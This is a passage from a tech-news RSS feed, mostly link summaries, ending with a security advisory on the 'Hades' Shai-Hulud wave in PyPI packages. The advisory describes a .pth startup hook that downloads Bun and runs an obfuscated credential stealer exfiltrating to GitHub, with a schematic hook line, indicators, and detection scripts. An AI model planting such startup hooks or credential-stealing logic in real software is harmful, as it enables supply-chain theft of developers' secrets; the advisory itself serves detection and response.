          📄 Amazon OpenSearch UI is now available in GovCloud regions
        </a>
        </h3><p>Amazon OpenSearch Service expands its modernized operational analytics experience to GovCloud regions, including AWS GovCloud (US-East) and AWS GovCloud (US-West), enabling users to gain insights acro</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/opensearch-ui-govcloud-region"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-seeking-counsel-ongoing-targeted-campaign-against-us-law-firms" class="group relative scroll-mt-24">
        <a href="#h3-seeking-counsel-ongoing-targeted-campaign-against-us-law-firms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms
        </a>
        </h3><p>Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan Introduction From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign e</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-your-ai-bill-is-out-of-control-cloudflare-can-fix-it-now" class="group relative scroll-mt-24">
        <a href="#h3-your-ai-bill-is-out-of-control-cloudflare-can-fix-it-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Your AI bill is out of control. Cloudflare can fix it now.
        </a>
        </h3><p>AI Gateway now features real-time spend limits to prevent runaway token bills across multiple AI providers. By integrating with Cloudflare Access, companies can use identity-driven budgets and policie</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/ai-gateway-spend-limits/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-metal-to-agent-why-agentic-ai-is-an-application-evolution" class="group relative scroll-mt-24">
        <a href="#h3-from-metal-to-agent-why-agentic-ai-is-an-application-evolution" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From metal to agent: Why agentic AI is an application evolution
        </a>
        </h3><p>We’re moving beyond simple prompts. The next frontier is agentic AI: autonomous systems that don’t just talk, but act across your enterprise. But as we move into this era, I’m hearing a consistent con</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/metal-agent-why-agentic-ai-application-evolution"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-model-evaluations-prove-your-routing-policy-actually-works" class="group relative scroll-mt-24">
        <a href="#h3-model-evaluations-prove-your-routing-policy-actually-works" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Model Evaluations: Prove Your Routing Policy Actually Works
        </a>
        </h3><p>Most teams running inference at scale do not fail because they cannot find a “good” model. They fail because they ship a routing policy that looks fine in a playground, but drifts the moment it sees r</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 DigitalOcean Blog</strong></p>
<p><a href="https://www.digitalocean.com/blog/model-evaluation-public-preview"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-for-managed-service-for-apache-spark-clusters" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-for-managed-service-for-apache-spark-clusters" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What's new for Managed Service for Apache Spark clusters
        </a>
        </h3><p>At Google Cloud, our goal is to let you run large-scale analytical and data science workloads with maximum efficiency so you can process big data pipelines, machine learning, and ETL tasks. We recentl</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/data-analytics/enhancements-to-managed-service-for-apache-spark-clusters/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-debug-deployment-failures-faster-with-the-deployments-tab-in-aws-elastic-beanstalk" class="group relative scroll-mt-24">
        <a href="#h3-debug-deployment-failures-faster-with-the-deployments-tab-in-aws-elastic-beanstalk" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Debug deployment failures faster with the Deployments tab in AWS Elastic Beanstalk
        </a>
        </h3><p>Introduction When a deployment fails, finding the root cause often means piecing together information from multiple sources. You wait for the deployment to finish, request a log bundle, download it, a</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/debug-deployment-failures-faster-with-the-deployments-tab-in-aws-elastic-beanstalk/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        </h2><h3 id="h3-visual-studio-code-1124" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1124" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.124
        </a>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.124 (Insiders)</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_124"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-with-foundry-microsoft-bets-the-enterprise-ai-battle-is-about-reliability-not-capability" class="group relative scroll-mt-24">
        <a href="#h3-with-foundry-microsoft-bets-the-enterprise-ai-battle-is-about-reliability-not-capability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 With Foundry, Microsoft bets the enterprise AI battle is about reliability, not capability
        </a>
        </h3><p>The agentic AI wave has produced no shortage of impressive demos. What it has produced less of is agents that</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/microsoft-foundry-build-2026-ai-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-microsoft-unlocks-visual-studio-for-developers-left-behind-by-its-own-ai" class="group relative scroll-mt-24">
        <a href="#h3-microsoft-unlocks-visual-studio-for-developers-left-behind-by-its-own-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Microsoft unlocks Visual Studio for developers left behind by its own AI
        </a>
        </h3><p>Microsoft used its Build 2026 conference last week to announce a series of updates to its flagship Visual Studio IDE</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/microsoft-visual-studio-ai-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-teams-now-deploy-1000-times-a-month-your-pipeline-wasnt-built-for-that" class="group relative scroll-mt-24">
        <a href="#h3-ai-teams-now-deploy-1000-times-a-month-your-pipeline-wasnt-built-for-that" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI teams now deploy 1,000 times a month. Your pipeline wasn’t built for that.
        </a>
        </h3><p>There’s mounting evidence that AI coding tools are delivering on their less outlandish promises. With adoption shifting from 76% in</p>
<p><strong>📅 Jun 7, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/ai-deployment-pipeline-velocity/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-microsoft-just-made-the-agent-runtime-free-and-kept-everything-around-it" class="group relative scroll-mt-24">
        <a href="#h3-microsoft-just-made-the-agent-runtime-free-and-kept-everything-around-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Microsoft just made the agent runtime free — and kept everything around it
        </a>
        </h3><p>Microsoft has the engineers to build its own agent runtime. At Build 2026 last week, it chose not to, shipping</p>
<p><strong>📅 Jun 7, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/microsoft-scout-openclaw-runtime/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-is-accelerating-devops-poor-integrations-are-slowing-it-down" class="group relative scroll-mt-24">
        <a href="#h3-ai-is-accelerating-devops-poor-integrations-are-slowing-it-down" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Is Accelerating DevOps, Poor Integrations Are Slowing It Down
        </a>
        </h3><p>As AI speeds up software delivery, the real bottleneck isn’t scanning or CI. It’s how safely and predictably change moves across tools, teams, and companies. Something strange is happening in DevOps r</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ai-is-accelerating-devops-poor-integrations-are-slowing-it-down/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ironworm-malware-shares-shai-hulud-traits-takes-threat-to-next-level" class="group relative scroll-mt-24">
        <a href="#h3-ironworm-malware-shares-shai-hulud-traits-takes-threat-to-next-level" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 IronWorm Malware Shares Shai-Hulud Traits, Takes Threat to ‘Next Level’
        </a>
        </h3><p>Open source software developers continue to come under attack, with the latest threat being a custom malware that shares many of the attributes of the notorious Shai-Hulud self-propagating worm but co</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ironworm-malware-shares-some-shai-hulud-traits-but-takes-it-to-next-level/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cloudflare-acquires-voidzero-to-advance-open-source-vite-ecosystem" class="group relative scroll-mt-24">
        <a href="#h3-cloudflare-acquires-voidzero-to-advance-open-source-vite-ecosystem" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cloudflare Acquires VoidZero to Advance Open Source Vite Ecosystem
        </a>
        </h3><p>Cloudflare this week acquired VoidZero, the maintainer of open source tools such as Vite, Vitest, Rolldown, Oxc, and Vite+ that are used widely to build web application frameworks. Rita Kozlov, vice p</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/cloudflare-acquires-voidzero-to-advance-open-source-vite-ecosystem/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-zig-isnt-10-yet" class="group relative scroll-mt-24">
        <a href="#h3-why-zig-isnt-10-yet" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why Zig Isn’t 1.0 (Yet)
        </a>
        </h3><p>Most programming languages follow a familiar trajectory: early experimental releases, rapid iteration, and then – at some point – a 1.0 version that signals stability and the potential for serious ado</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/blog/2026/06/05/why-zig-isn-t-1-0-yet/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-java-annotated-monthly-june-2026" class="group relative scroll-mt-24">
        <a href="#h3-java-annotated-monthly-june-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Java Annotated Monthly – June 2026
        </a>
        </h3><p>A fresh edition of Java Annotated Monthly has landed! The world of software development keeps moving at full speed, and this month’s selection helps you keep up without drowning in tabs. Inside, you’l</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/idea/2026/06/java-annotated-monthly-june-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-beyond-tokens-per-watt-using-ubuntu-2604-lts-for-ai" class="group relative scroll-mt-24">
        <a href="#h3-beyond-tokens-per-watt-using-ubuntu-2604-lts-for-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Beyond tokens per watt – using Ubuntu 26.04 LTS for AI
        </a>
        </h3><p>Tokens per watt (TpW) – the measure of useful AI work produced per watt of energy consumed – is the metric at top of mind for CEOs, heads of AI, and infrastructure teams alike. With the tremendous cos</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/beyond-tokens-per-watt"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cyber-resilience-act-cra-how-suse-provides-innovation-and-trust-in-the-secure-software-era" class="group relative scroll-mt-24">
        <a href="#h3-cyber-resilience-act-cra-how-suse-provides-innovation-and-trust-in-the-secure-software-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cyber Resilience Act (CRA): How SUSE Provides Innovation and Trust in the Secure Software Era
        </a>
        </h3><p>The European Union’s Cyber Resilience Act (CRA) represents a historic evolution in the global digital landscape. Rather than viewing it as a regulatory hurdle, forward-thinking enterprises recognize t</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/cyber-resilience-act-compliance-suse/"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Shai-Hulud Reaches PyPI: The Hades Wave That Runs Before You Import It]]></title>
      <link>https://devops-daily.com/posts/shai-hulud-hades-pypi-wave-june-2026</link>
      <description><![CDATA[The Shai-Hulud worm jumped to PyPI on June 7. The Hades wave hides in 19 Python packages, runs at interpreter startup through a .pth hook before you import anything, and steals your CI/CD secrets.]]></description>
      <pubDate>Sun, 07 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/shai-hulud-hades-pypi-wave-june-2026</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Supply Chain]]></category><category><![CDATA[PyPI]]></category><category><![CDATA[Python]]></category><category><![CDATA[Security]]></category><category><![CDATA[Shai-Hulud]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[CICD]]></category>
      <content:encoded><![CDATA[<p>On June 7, 2026, the Shai-Hulud worm reached PyPI in a way it had not before. Earlier waves rode npm install hooks and Packagist. This one, which Socket tracks as the &quot;Hades&quot; branch of the Shai-Hulud/Miasma family, hides inside Python wheels and runs the moment your interpreter starts, before you import anything from the package.</p>
<p>That detail matters. Most people picture a malicious package as something that fires when you <code>import</code> it, or at worst during a build step you can sandbox. Hades runs through a Python startup hook, so a single <code>pip install</code> of a poisoned wheel is enough to execute the payload on the next interpreter start, on your laptop or on a CI runner. Once it runs, it goes after exactly what a build machine tends to hold: GitHub tokens, PyPI and npm publishing tokens, cloud credentials, and SSH keys.</p>
<p>This is the same worm family behind the <a href="/posts/mini-shai-hulud-pytorch-lightning-supply-chain-attack">PyTorch Lightning incident</a> and the <a href="/posts/antv-npm-shai-hulud-wave-may-2026">AntV npm wave</a>. The tradecraft is familiar, but the Python delivery is new. This post is the practical version: what shipped, how the startup trick works, the indicators to grep for, and the order to rotate secrets if you were exposed.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li>New Shai-Hulud wave on PyPI, June 7, 2026, tracked as the &quot;Hades&quot; branch. Socket counted 37 malicious wheels across 19 PyPI packages, plus a parallel npm campaign of 411 artifacts across 106 packages.</li>
<li>It looks like a single maintainer-account takeover. Consecutive patch releases were mass-published across the author&#39;s whole portfolio at once.</li>
<li>The wheels carry a <code>.pth</code> startup hook that runs at interpreter startup, with no import required, then downloads Bun and runs an obfuscated JavaScript stealer.</li>
<li>It steals GitHub, PyPI, npm, cloud (AWS, GCP, Azure), Kubernetes, and Vault credentials, plus <code>.env</code>, <code>.npmrc</code>, <code>.pypirc</code>, and AI tool configs, then exfiltrates to attacker-created public GitHub repos.</li>
<li>High-download research packages were hit, including <code>dynamo-release</code>, <code>spateo-release</code>, <code>coolbox</code>, and <code>ufish</code>. PyPI quarantined a number of releases, and Socket flagged the cluster minutes after publication.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>You install Python packages with <code>pip</code>, <code>uv</code>, or <code>poetry</code>, or your CI does</li>
<li>You publish to PyPI, or your build runners hold GitHub or cloud credentials</li>
<li>Basic comfort with the shell and, for the org audit, the GitHub CLI (<code>gh</code>)</li>
</ul>
<h2 id="h2-what-shipped" class="group relative scroll-mt-24">
        <a href="#h2-what-shipped" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What shipped
        </a>
        </h2><p>Socket&#39;s analysis puts the PyPI side at 37 malicious wheel artifacts across 19 packages, with 411 artifacts across 106 packages on the npm side of the same campaign, for 448 tracked artifacts in total. The pattern on PyPI was a burst of consecutive patch releases across one author&#39;s entire portfolio, which points to a compromised maintainer account rather than 19 separate attacks.</p>
<p>The painful part is that several of the affected packages are real research tools with hundreds of thousands of cumulative downloads:</p>
<ul>
<li><code>dynamo-release</code>, a single-cell RNA velocity framework</li>
<li><code>spateo-release</code>, a spatial transcriptomics toolkit</li>
<li><code>coolbox</code>, a Jupyter genomic visualization library</li>
<li><code>ufish</code> and <code>napari-ufish</code>, deep-learning FISH spot detection</li>
</ul>
<p>The full set of 19 compromised PyPI packages:</p>
<pre><code class="hljs language-text">bramin            cmd2func          coolbox
dynamo-release    executor-engine   executor-http
funcdesc          magique           magique-ai
mrbios            napari-ufish      nucbox
okite             pantheon-agents   pantheon-toolsets
spateo-release    synago            ufish
uprobe
</code></pre><p>If any of these are in your environment, treat the host as compromised and work through the response section below.</p>
<h2 id="h2-how-the-hades-wave-works" class="group relative scroll-mt-24">
        <a href="#h2-how-the-hades-wave-works" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How the Hades wave works
        </a>
        </h2><p>The clever, and genuinely new, part is the trigger. Each malicious wheel ships two files: a startup hook named like <code>*-setup.pth</code>, and an obfuscated JavaScript payload named <code>_index.js</code>.</p>
<h3 id="h3-the-pth-startup-trick" class="group relative scroll-mt-24">
        <a href="#h3-the-pth-startup-trick" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The .pth startup trick
        </a>
        </h3><p>Python&#39;s <code>site</code> module processes every <code>.pth</code> file in your <code>site-packages</code> directory at interpreter startup. Normally a <code>.pth</code> file just adds directories to the import path. But there is a documented behavior: any line that begins with <code>import</code> is executed. Hades abuses exactly that.</p>
<pre><code class="hljs language-text"># A normal .pth file just lists paths:
../some/extra/path

# Hades ships a line that starts with &quot;import&quot;, so Python RUNS it
# every time the interpreter starts, with no package import needed:
import os; exec(&lt;loader that finds and runs _index.js&gt;)
</code></pre><p>This converts a one-time <code>pip install</code> into automatic execution on the next <code>python</code> invocation. You do not have to import the package. You do not even have to run the project that depends on it. Any Python process on the machine triggers it.</p>
<h3 id="h3-bring-your-own-runtime" class="group relative scroll-mt-24">
        <a href="#h3-bring-your-own-runtime" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Bring your own runtime
        </a>
        </h3><p>The Python loader does not assume Node.js or any particular runtime is present. It:</p>
<ol>
<li>Checks for a sentinel file at <code>&lt;tempdir&gt;/.bun_ran</code> and exits early if it exists</li>
<li>Locates <code>_index.js</code> inside the installed package</li>
<li>Downloads Bun v1.3.13 from <code>github.com/oven-sh/bun</code> if no cached binary is around</li>
<li>Runs <code>bun run _index.js</code></li>
<li>Writes the sentinel so it does not fire repeatedly</li>
</ol>
<p>Downloading its own runtime is a Shai-Hulud signature. It means the payload runs the same way whether or not the victim has Node installed, which is why a Python-only shop is not safe just because it has no npm toolchain.</p>
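<p>The check below is an added example, not code from the original post or from Socket: it lists the lines in <code>.pth</code> files that the <code>site</code> module would execute and looks for the <code>.bun_ran</code> sentinel from the loader steps above. The function names, the <code>RISKY_TOKENS</code> ranking heuristic, and the sample files are assumptions constructed for illustration.</p>

```python
"""Triage .pth startup hooks in site-packages (added example, not from the post)."""
import os
import site
import sys
import tempfile

SENTINEL_NAME = ".bun_ran"   # from the post: written under the temp dir after the loader ran
HOOK_SUFFIX = "-setup.pth"   # from the post: hook files are named like *-setup.pth
# Assumption: substrings used only to rank findings, not a signature of this campaign.
RISKY_TOKENS = ("exec(", "eval(", "subprocess", "os.system", "urllib", "base64")


def executable_lines(pth_path):
    """Return [(line_number, text)] for the lines site.py would pass to exec()."""
    hits = []
    with open(pth_path, "r", encoding="utf-8-sig", errors="replace") as handle:
        for number, raw in enumerate(handle, start=1):
            line = raw.rstrip("\r\n")
            # site.py runs a line only if it starts with "import" plus space or tab.
            # Comment lines and plain path entries are never executed.
            if line.startswith(("import ", "import\t")):
                hits.append((number, line))
    return hits


def scan_site_dir(directory):
    """List every .pth file in one directory that carries executable lines."""
    findings = []
    try:
        names = sorted(os.listdir(directory))
    except OSError:
        return findings  # missing or unreadable directory: nothing to report
    for name in names:
        if not name.endswith(".pth"):
            continue
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        hits = executable_lines(path)
        if not hits:
            continue
        findings.append({
            "path": path,
            "lines": hits,
            "named_like_hook": name.endswith(HOOK_SUFFIX),
            "risky": any(tok in text for _, text in hits for tok in RISKY_TOKENS),
        })
    return findings


def sentinel_present(tempdir=None):
    """True if the loader's run-once marker exists in the temp directory."""
    return os.path.exists(os.path.join(tempdir or tempfile.gettempdir(), SENTINEL_NAME))


def default_site_dirs():
    """Global and per-user site-packages of the interpreter running this script."""
    dirs = list(site.getsitepackages()) if hasattr(site, "getsitepackages") else []
    dirs.append(site.getusersitepackages())
    return dirs


def write_constructed_samples(directory):
    """Constructed sample files for a dry run; the 'hook' line is inert."""
    samples = {
        "extra-paths.pth": "# import looks_like_code_but_is_a_comment\n../some/extra/path\n",
        "editable-finder.pth": "import sys\n",
        "demo-setup.pth": "../pkg\nimport os; exec('pass')\n",
    }
    for name, body in samples.items():
        with open(os.path.join(directory, name), "w", encoding="utf-8") as handle:
            handle.write(body)


def main(argv):
    # Directories given on the command line win; otherwise scan this interpreter's own.
    targets = argv[1:] or default_site_dirs()
    for directory in targets:
        for item in scan_site_dir(directory):
            tags = [t for t in ("named_like_hook", "risky") if item[t]]
            print(item["path"], ",".join(tags) or "review")
            for number, text in item["lines"]:
                print("   line", number, ":", text[:120])
    print("sentinel", SENTINEL_NAME, "present:", sentinel_present())
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

<p>Start it with <code>python3 -S</code> and pass the site-packages path as an argument: <code>-S</code> skips the <code>site</code> import, so the scan does not trigger the hooks it is inspecting. Setuptools and editable installs also ship <code>.pth</code> files with <code>import</code> lines, so a hit means review, not proof.</p>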
<h3 id="h3-the-stealer" class="group relative scroll-mt-24">
        <a href="#h3-the-stealer" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The stealer
        </a>
        </h3><p><code>_index.js</code> is wrapped in several layers: an <code>eval</code> shell with character-code and rotation decoding, AES-128-GCM and AES-256-GCM stages, gzip, custom PBKDF2/SHA256 decoders, and decoy tokens to slow analysis. It also checks the environment, skipping execution under a Russian locale and watching for StepSecurity harden-runner.</p>
<p>Once decoded, it harvests a wide set of secrets:</p>
<ul>
<li>GitHub tokens, GitHub Actions runner secrets, and SSH keys</li>
<li>Publishing tokens for npm, PyPI, RubyGems, JFrog, and CircleCI</li>
<li>AWS, GCP, Azure, Kubernetes, and HashiCorp Vault credentials</li>
<li><code>.env</code>, <code>.npmrc</code>, <code>.pypirc</code>, Docker configs, shell history, and cloud CLI caches</li>
<li>Claude and MCP configuration files</li>
</ul>
<h3 id="h3-exfiltration" class="group relative scroll-mt-24">
        <a href="#h3-exfiltration" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Exfiltration
        </a>
        </h3><p>The primary channel is GitHub itself. The payload uses a stolen token to create a public repository via <code>POST /user/repos</code>, then commits the encrypted results to paths like <code>results/results-&lt;timestamp&gt;-&lt;counter&gt;.json</code>. The campaign markers are blunt:</p>
<ul>
<li>Repository description: <code>Hades - The End for the Damned</code></li>
<li>Commit message marker: <code>IfYouYankThisTokenItWillNukeTheComputerOfTheOwnerFully</code></li>
<li>On CI, a GitHub Actions artifact named <code>format-results</code> and a workflow named <code>Run Copilot</code></li>
</ul>
<p>There is also traffic to <code>https://api.anthropic.com/v1/api</code>. That is Anthropic&#39;s real API host, but <code>/v1/api</code> is not a real route. Socket assesses it as network-log camouflage, traffic designed to look benign rather than to move data.</p>
<h3 id="h3-what-is-new-this-time" class="group relative scroll-mt-24">
        <a href="#h3-what-is-new-this-time" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What is new this time
        </a>
        </h3><p>Compared with earlier Shai-Hulud waves, three things stand out:</p>
<ul>
<li><strong>Python-native trigger.</strong> A <code>.pth</code> startup hook replaces the npm <code>preinstall</code> script. It runs earlier and on a broader set of processes.</li>
<li><strong>Hades theming.</strong> The previous Miasma wave used Zelda references. This one uses underworld names like <code>stygian</code>, <code>cerberus</code>, and <code>thanatos</code>, with the <code>Hades - The End for the Damned</code> exfil marker.</li>
<li><strong>Toolchain persistence.</strong> Recovered artifacts reach into developer tooling: a <code>gh-token-monitor</code> daemon with systemd or LaunchAgent persistence, <code>.claude/setup.mjs</code> and <code>.github/setup.js</code> hooks, an injected <code>.github/workflows/codeql.yml</code>, and <code>~/.local/share/updater/update.py</code>.</li>
</ul>
<h2 id="h2-are-you-exposed-what-to-check" class="group relative scroll-mt-24">
        <a href="#h2-are-you-exposed-what-to-check" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Are you exposed? What to check
        </a>
        </h2><p>First, check whether any affected package is installed:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># List installed packages and match against the compromised set</span>
pip list --format=freeze 2&gt;/dev/null | grep -iE \
  <span class="hljs-string">&#x27;^(bramin|cmd2func|coolbox|dynamo-release|executor-engine|executor-http|funcdesc|magique|magique-ai|mrbios|napari-ufish|nucbox|okite|pantheon-agents|pantheon-toolsets|spateo-release|synago|ufish|uprobe)=&#x27;</span>
</code></pre><p>Then scan the host for the runtime indicators the loader leaves behind:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Sentinel file and the dropped Bun runtime</span>
<span class="hljs-built_in">ls</span> -la <span class="hljs-string">&quot;<span class="hljs-variable">${TMPDIR:-/tmp}</span>/.bun_ran&quot;</span> /tmp/b.zip /tmp/b/bun 2&gt;/dev/null

<span class="hljs-comment"># The JavaScript payload and the startup hook inside site-packages</span>
find <span class="hljs-string">&quot;<span class="hljs-subst">$(python -c &#x27;import site; print(site.getsitepackages()</span>[0])&#x27; 2&gt;/dev/null)&quot;</span> \
  -name <span class="hljs-string">&#x27;_index.js&#x27;</span> -o -name <span class="hljs-string">&#x27;*-setup.pth&#x27;</span> 2&gt;/dev/null

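<span class="hljs-comment"># Any .pth file that executes an import line (the startup trick)</span>
<span class="hljs-comment"># --include limits the search to .pth files; without it every .py file that starts a line with &quot;import &quot; matches.</span>
<span class="hljs-comment"># Expect a few legitimate hits (for example setuptools&#x27; distutils-precedence.pth) and review each one.</span>
grep -rEl --include=<span class="hljs-string">&#x27;*.pth&#x27;</span> <span class="hljs-string">&#x27;^import &#x27;</span> $(python -c <span class="hljs-string">&#x27;import site; print(&quot; &quot;.join(site.getsitepackages()))&#x27;</span> 2&gt;/dev/null) 2&gt;/dev/null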
</code></pre><p>If you have a GitHub organization, audit it for the exfiltration markers:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Public repos created with the Hades description</span>
gh search repos <span class="hljs-string">&#x27;Hades - The End for the Damned&#x27;</span> --json fullName,createdAt

<span class="hljs-comment"># Commits carrying the campaign marker across your org</span>
gh search commits <span class="hljs-string">&#x27;IfYouYankThisTokenItWillNukeTheComputerOfTheOwnerFully&#x27;</span> --json repository

<span class="hljs-comment"># Suspicious workflow and artifact names in your repos</span>
<span class="hljs-comment"># (look for a workflow called &quot;Run Copilot&quot; and artifacts named &quot;format-results&quot;)</span>
</code></pre><p>Watch your logs for a <code>python</code> process spawning a <code>bun</code> binary, outbound requests to <code>github.com/oven-sh/bun/releases/download/</code>, and writes to <code>/tmp/b.zip</code> or <code>/tmp/b/bun</code>.</p>
<h2 id="h2-if-you-were-hit-respond-in-this-order" class="group relative scroll-mt-24">
        <a href="#h2-if-you-were-hit-respond-in-this-order" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          If you were hit: respond in this order
        </a>
        </h2><p>Assume any secret reachable from the affected host or runner is burned. Rotate in priority order, highest blast radius first.</p>
<ol>
<li><strong>GitHub.</strong> Personal access tokens, GitHub App tokens, Actions secrets, and deploy keys. Revoke, do not just rotate, anything the runner could read.</li>
